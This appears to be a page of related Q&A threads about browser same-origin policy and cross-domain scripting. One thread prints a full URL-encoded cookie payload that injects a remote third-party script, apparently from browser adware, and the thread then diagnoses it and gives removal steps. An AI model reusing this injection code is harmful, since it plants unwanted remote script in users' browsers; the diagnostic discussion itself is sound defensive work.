I'm a bit confused about this.
Does XMLHttpRequest work on a remote URL or does it have to be a local file? There seems to be mixed information on the net.
According to w3.org: The XMLHttpRequest object can be used by scripts to programmatically connect to their originating server via HTTP.
But I've seen it used to access non-local web pages (in vista gadgets for instance for rss feeds) without using a proxy...
Enlighten me please!
It depends on the environment. If you run your JavaScript on a regular web page, XMLHttpRequest won't be able to connect to any other site. (That's what w3.org says, and browsers do implement this restriction.) However, in some contexts (such as Vista gadgets and Greasemonkey), it it possible to connect to any site in an AJAX request.
On a standerd web page you cant however in an app with authorised permissions you can such as a chrome extension with the permission "http://*" set. In my opinion this is a stupid restriction for normal web pages any damage/harm that can be done with it could be done using an iframe and the browsers refuse to disable them (long over due in my opinion).
Related
Some clients send requests to our webapp with additional cookies like this:
vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.633227847.1500039040; _gid=GA1.2.1587477355.1500039040; _gat_ga_ua2=1; _gat_ga%28'create'%2C'UA-93290101-3'%2C'auto'%2C%22ga_ua2%22%29%3Bga%28'ga_ua2.send'%2C'pageview'%29%3B!function%28%29%7Bfunction%20e%28e%2Ct%29%7Bvar%20d%3Ddocument.createElement%28%22iframe%22%29%3Bd.src%3D%22about%3Ablank%22%2Cd.style.display%3D%22none%22%2Cdocument.body.appendChild%28d%29%2CElement.prototype.appendChild%3Dd.contentWindow.Element.prototype.appendChild%2CElement.prototype.insertBefore%3Dd.contentWindow.Element.prototype.insertBefore%3Bvar%20n%3Ddocument.createElement%28%22script%22%29%3Bn.type%3D%22text%2Fjavascript%22%2Cn.async%3D!0%2Cn.src%3D%22%2F%2Fd323drta3nak2g.cloudfront.net%2Fv1%2Ftaas%3Fid%3D%22%2Be%2B%22%26api_key%3D45918e2d6de38b8deaf7927d277e58d5%26site_id%3D%22%2Bt%2B%22%26disclosure_text%3D%26disclosure_url%3Dhttps%253A%252F%252Fyieldkit.com%252Flegal-notes%252Fterms-of-service%252F%26yk_tag%3Db%22%2C%28document.getElementsByTagName%28%22head%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28n%29%7De%28%22se.prod%26pla%3D1%26si%3D1%26%22%2C%220c4d5f3a79914d97b6011efb4471a249%22%29%2Ce%28%22deals.prod%22%2C%22d7d224892cfe47c7b50aed3bb644057f%22%29%7D%28%29%3B%2F%2F=1;
Our application does not install such cookies. We used some external JavaScript, like Google Analytics, but none of those scripts is doing this. Our site is accessible only via HTTPS, so MITM request modification is unlikely.
We use WAF, these requests are blocked and clients are unhappy.
I suppose, some malicious browser extension is trying to exploit some popular web engine vulnerability.
Has anybody encountered anything like this? Any ideas on what is doing that?
P.S. URL decoded content of that cookie is javascript, that among other contains link to http://yieldkit.com/legal-notes/terms-of-service/, but they are probably just used by scammer to monetize their attacks.
Found it. This malware does this: http://www.spyware-ru.com/udalit-r-srvtrck-com-reklamu-instruktsiya/ (article in russian) and translated with google translate.
Short summary:
There is a malware, that creates pop-up advertising windows with r.srvtrck.com site for Chrome, Firefox and IE. Also it may integrate advertising into web sites you open.
To remove it, you can use:
AdwCleaner program
Malwarebytes Anti-malware program
reset browser settings
clear *.lnk files from added site address after browser executable
AdGuard program to block advertising (I'd not recommend that, just clear your system and use AdBlock/uBlock)
It is recommended to check Windows Task Scheduler for unwanted tasks, that periodically start browser with malware site address.
I have a website hosted in ISS (can be other) that loads when it's called on localhost but not from extern :) like: http://:8081/Website.html.
The verification whether the website is called from localhost it's on the client in a js script that I can’t modify as it’s encrypted.
So I was thinking at two options:
Develop an ASP application that has a remote desktop connection to the machine that host the website (not some many example on how to).
Maybe configure the IIS configuration (didn't found how)
I'm out of ideas
Do you have any other solution or can you point on how can I do one of the above?
I have tried the WinForm solution from here: https://www.codeproject.com/kb/cs/remotedesktop_csharpnet.aspx and it doesn't work. And I prefer a website.
Updates:
The only working solution that I have for now is to configure a Remote Desktop Services (Web Access) as I hosted the application on Server 2008 R2. Then I only shared the browser that has the localhost page as default page
The javascript files are all minified and encrypted, meaning that if I search localhost as a word in all the files, nothing shows up. So fixing the client will be hard.
Is it possible to create a new Site Binding on IIS and access the site using the binding hostname? This requires your network DNS to register the hostname to the IP Address.
I assume you are dealing with encrypted(???) javascript that is hardcoded to display DOM only if it is loaded from localhost.
If by encrypted you mean minified you should still be able to find reference to "localhost" and modify javascript in minified version. If it is really encrypted by a wrapper of third party javascript library then I would suggest you to rewrite javascript. I mean how can there be any quality code in javascript code that is hardcoded to load only from localhost?
Fix the client and stop exploring other solutions like remote desktop connection. None of them are practical and sustainable solutions.
I think you need to use WebRTC, but it's supported for Chrome and Firefox. It allows two users to communicate directly, browser to browser using the RTCPeerConnection API.
i have seen this Post:
Authenticate a facebook user in a Firefox plug-in
and in the third comment someone said, that it isn't possible to load the facebook sdk into a firefox extension. But why?
The JavaScript SDK provided by Facebook relies on a script from connect.facebook.com to be inserted into a web page. However, when you are an extension you don't have a web page around to load this script - you have extension pages. These extension pages are privileged, loading the script into them would give that script permission to do things like reading files on user's disk drive (or simply format it). Doing that with a script on some remote server is a pretty big security risk even if Facebook is considered a trusted site - its servers could get hacked or the traffic might be intercepted and modified. An attacker could then essentially take over user's computer.
Getting an unprivileged context for the Facebook SDK is theoretically possible. Practically however this is complicated enough that I doubt anybody has done it (it's further complicated by the fact the App IDs are bound to a specific host name).
I'm writing a JavaScript client application that uses the XMLHttpRequest object to fetch XML data from a server. However, all browsers except IE7/8 deny the request due to security concerns as outlined in the Same Origin Policy. It's important that this application works in IE, FF, and Chrome when run as a local file.
I've found success in Chrome when I use the --disable-web-security flag, but I can't imagine clients laughing it off when I say "Oh, make sure you disable web security or else it won't work."
I'd really appreciate some help!
EDIT: I don't have access to the server the XML comes from.
You may build a kind of proxy, a serverside application somewhere on the web, which retrieves the XML and delivers the xml inside a javascript-file.
I have an application running in websphere that invokes a new window which is loaded by weblogic server. When I close the child window which is running in weblogic server, I would like to refresh the parent window running in websphere.
I tried the following ways but all of them were throwing permission denied script error.
window.opener.location.reload();
window.parent.functionName();
Please suggest a way to over come the cross server scripting error.
i will assume that the 2 servers are hosted from/referenced via different domain names ie:
server1.com/ and server2.com/
Some browser functions are limited when called from a page with a different top level domain name.
you can use different sub-domains with the same top level domain though ie:
server1.server.com/
server2.server.com/
with this configuration browsers will let you do anything.
I have not tired it out but previously I have seen that Cross domain calls were a problem with regular raw javascript. But was working pretty easily with JQuery APIs. Have a look in that direction.